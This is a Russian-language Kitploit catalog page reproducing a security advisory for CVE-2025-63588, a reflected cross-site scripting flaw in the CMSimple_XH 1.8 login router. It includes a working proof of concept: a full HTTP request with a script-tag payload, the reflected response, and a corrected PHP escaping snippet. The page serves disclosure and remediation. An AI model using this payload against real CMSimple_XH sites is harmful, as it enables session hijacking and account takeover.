Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-63588 | Kitploit
Инструменты/GitHubGitHub/cybercrewinc/cve-2025-63588
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и Образование
GitHubcybercrewinc/cve-2025-63588

CVE-2025-63588

Репозиторий
9 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-63588: отражённый межсайтовый скриптинг (XSS) в обработке пути cmsimplexh в CMSimple_XH

Оценка CVSS v3.1: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (Средний) Присвоенный CVE: CVE-2025-63588
Продукты: CMSimple_XH - 1.8 Поставщик: CMSimple_XH - https://www.cmsimple-xh.org/

Краткое описание

В коде фронт-роутера CMSimple_XH, обрабатывающего динамические входные данные, связанные с авторизацией, существует уязвимость отражённого межсайтового скриптинга (XSS). Приложение отражает контролируемые атакующим данные, взятые из URI запроса, непосредственно в генерируемый HTML (например, в атрибут action форм и атрибуты href ссылок) без надлежащего кодирования вывода. Атакующий может создать URL, при переходе по которому жертвой в её браузере в контексте уязвимого сайта будет выполнен произвольный JavaScript.

Это отражённый XSS (непостоянный); для эксплуатации требуется, чтобы жертва перешла по специально созданной ссылке. Поставщик был уведомлён, проблема задокументирована, и ей присвоен указанный выше CVE.

Воздействие

  • Выполнение кода на стороне клиента — произвольный JavaScript может выполняться в контексте сайта.
  • Раскрытие информации — скрипты могут читать содержимое DOM и любые доступные клиенту cookie-файлы или токены. Если для сессионных cookie не установлен флаг HttpOnly, токены сессии могут быть похищены.
  • Перехват сессии / выдача себя за жертву — эксфильтрация токенов может позволить захватить учётную запись в зависимости от привилегий жертвы.
  • Фишинг / подделка интерфейса / принудительные действия — внедрённые скрипты могут создавать поддельный интерфейс, перенаправлять пользователя или выполнять действия в рамках сессии жертвы.

Затронутый компонент

Уязвимость берёт начало в коде фронт-роутера / index.php (или эквивалентного фронт-контроллера), который разбирает динамические сегменты пути и сопоставляет их с переменными страницы/шаблона. Необработанные фрагменты пути (фрагменты вида ?Templates..., используемые роутером CMSimple_XH) передаются в шаблоны страниц и внедряются в HTML-атрибуты без надлежащего кодирования или очистки HTML-атрибутов, что позволяет внедрённым тегам <script> или другим полезным нагрузкам отображаться как есть. Аналогичные проблемы отражённого XSS публиковались и для других веб-компонентов; как правило, они вызваны некорректным кодированием вывода недоверенных входных данных.

Подтверждение концепции (PoC)

Этот PoC демонстрирует отражение переданных атакующим данных в возвращаемом HTML, которое приведёт к выполнению кода в браузере жертвы.

Запрос:

root@kitploit:~
POST /cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9 HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates&login
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 45

login=true&keycut=z9U%21q2k%21F0&submit=Login
Pasted image 20251006200014

Ответ:

root@kitploit:~
HTTP/1.1 200 OK
Host: 192.168.98.129:8080
Date: Mon, 06 Oct 2025 02:50:49 GMT
Connection: close
X-Powered-By: PHP/8.3.6
Set-Cookie: XH_2f636d73696d706c6578682f=v7hkld81biddtmoua1maptd18a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<title>English Site Title – Login</title>
<meta name="robots" content="noindex">
<meta name="keywords" content="Enter list of comma separated keywords here">
<meta name="description" content="Enter website description for search engine results here">
<link rel="stylesheet" href="./assets/css/xhstyles.css" type="text/css">
<link rel="stylesheet" href="./templates/fhs-simple-2019/stylesheet.css" type="text/css">
<meta name="robots" content="noindex">
</head>
<body class="xh_login" onload="document.forms['login'].elements['keycut'].focus();">
<div class="xh_login"><h1>Login</h1><p class="xh_fail">You have entered a wrong password!</p><p><b>Site administration. Please enter password.</b></p><form id="login" name="login" action="/cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9" method="post"><input type="hidden" name="login" value="true"><input type="password" name="keycut" id="passwd" value=""> <input type="submit" name="submit" id="submit" value="Login"></form><p><a href="/cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9">Back</a></p> </div></body>
</html>
Pasted image 20251006200122

Когда браузер жертвы отрисовывает эту страницу, внедрённый <script>alert(1)</script> выполняется. Pasted image 20251006204432 Pasted image 20251006204517

Рекомендуемый пример PHP для безопасного вывода атрибута action:

root@kitploit:~
$action_url = '/cmsimplexh/?' . rawurlencode($template_token);
echo '<form action="' . htmlspecialchars($action_url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '" method="post">';

Авторы

Авторы

Присвоенный CVE:** CVE-2025-63588

https://nvd.nist.gov/vuln/detail/CVE-2025-63588

Обнаружил:株式会社CyberCrew / サイバークル

Ссылки

https://github.com/cmsimple-xh/cmsimple-xh/releases https://nvd.nist.gov/vuln/detail/CVE-2025-24576


✉️ Контакты

Если у вас есть вопросы или предложения, пожалуйста, не стесняйтесь обращаться к нам.


🏢 株式会社CyberCrew

G1@4x

📞 Тел.: 03-6853-5823
📧 Почта:[email protected]


📄 О компании

ПунктСодержание
Название компании株式会社CyberCrew
АдресТокио, район Тиёда, Сотоканда 1-18-13, здание Akihabara Dai Building, 6-й этаж

🔐 Основные услуги

🛡️ Аудит безопасности и оценка рисков

Всесторонне анализируем уязвимости организации и предлагаем оптимальные меры по их устранению.

💻 Тестирование на проникновение

Выполняем целевые, сценарные, а также LLM-пентесты.

🌒 Мониторинг даркнета

Раннее выявление утечек конфиденциальной информации и оперативное реагирование.

🎯 Учения Red Team и социальная инженерия

Проводим оценку защищённости на основе практических сценариев атак.

🧠 Проектирование безопасных систем и консалтинг

Помогаем проектировать системы с учётом требований безопасности, начиная с ранних стадий разработки.


🌐 Официальный сайт:https://www.cybercrew.co.jp
🕒 CyberCrew — ваш надёжный партнёр в области безопасности.

Скачать инструмент